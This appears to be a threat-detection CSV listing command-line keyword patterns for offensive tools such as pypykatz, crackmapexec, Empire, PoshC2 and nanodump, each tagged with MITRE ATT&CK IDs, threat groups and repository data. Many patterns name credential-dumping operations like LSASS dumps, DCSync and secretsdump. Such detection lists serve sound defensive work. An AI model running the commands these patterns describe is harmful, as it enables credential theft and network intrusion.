TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ldap * -u * -p * --admin-count*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ldap * -u * -p * -M whoami *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ldap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ldap-novell-getpass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ldap-rootdse.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ldap-search.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --ldapusername * --ldappassword *,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* ldeep_dump *,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,0,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -* lexmark-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* linpeas.sh *,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,0,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -* linpeas.sh*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -linpeas=http://127.0.0.1/linpeas.sh*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,0,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -* linWinPwn*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* --list=hidden-options*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --list-payloads*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -* live dpapi blobfile *.blob*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi cred *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi keys -o *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi securestring *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi vcred *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi vpol *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live dpapi wifi*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos apreq *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos dump*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos purge*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos roast*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos sessions*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos tgt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live kerberos triage*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live lsa -o *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live lsa -o *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live process create -c regedit*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smb client *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smb dcsync *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smb lsassdump *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smb regdump *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smb secretsdump *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smbapi localgroup enum -t*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smbapi session enum *,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live smbapi share enum*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* live users whoami*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -* llmnr-resolve.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -LLMNRTTL *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -llmnrtypes AAAA*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -* lltd-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --llvm-obfuscator * ,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,0,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -* LMHASH:NTHASH*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -LNKPath * -EncScript *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-BackdoorLNK.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* load_extra_pots*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --load-dll *ssp.dll*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* --load-shellcode *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* local class-instances SMS_Authority*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* local class-properties SMS_Authority*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* local grep *ccmsetup started *ccmsetup.log*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* local query * FROM SMS_Authority*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* local secrets -m disk*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* local secrets -m wmi*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* --local-auth --shares*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* -LocalPoshC2ProjectDir *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* -LocalPoshC2ProjectDir *,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* -lockless -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* --loggedon-users*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --lport 1337 *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 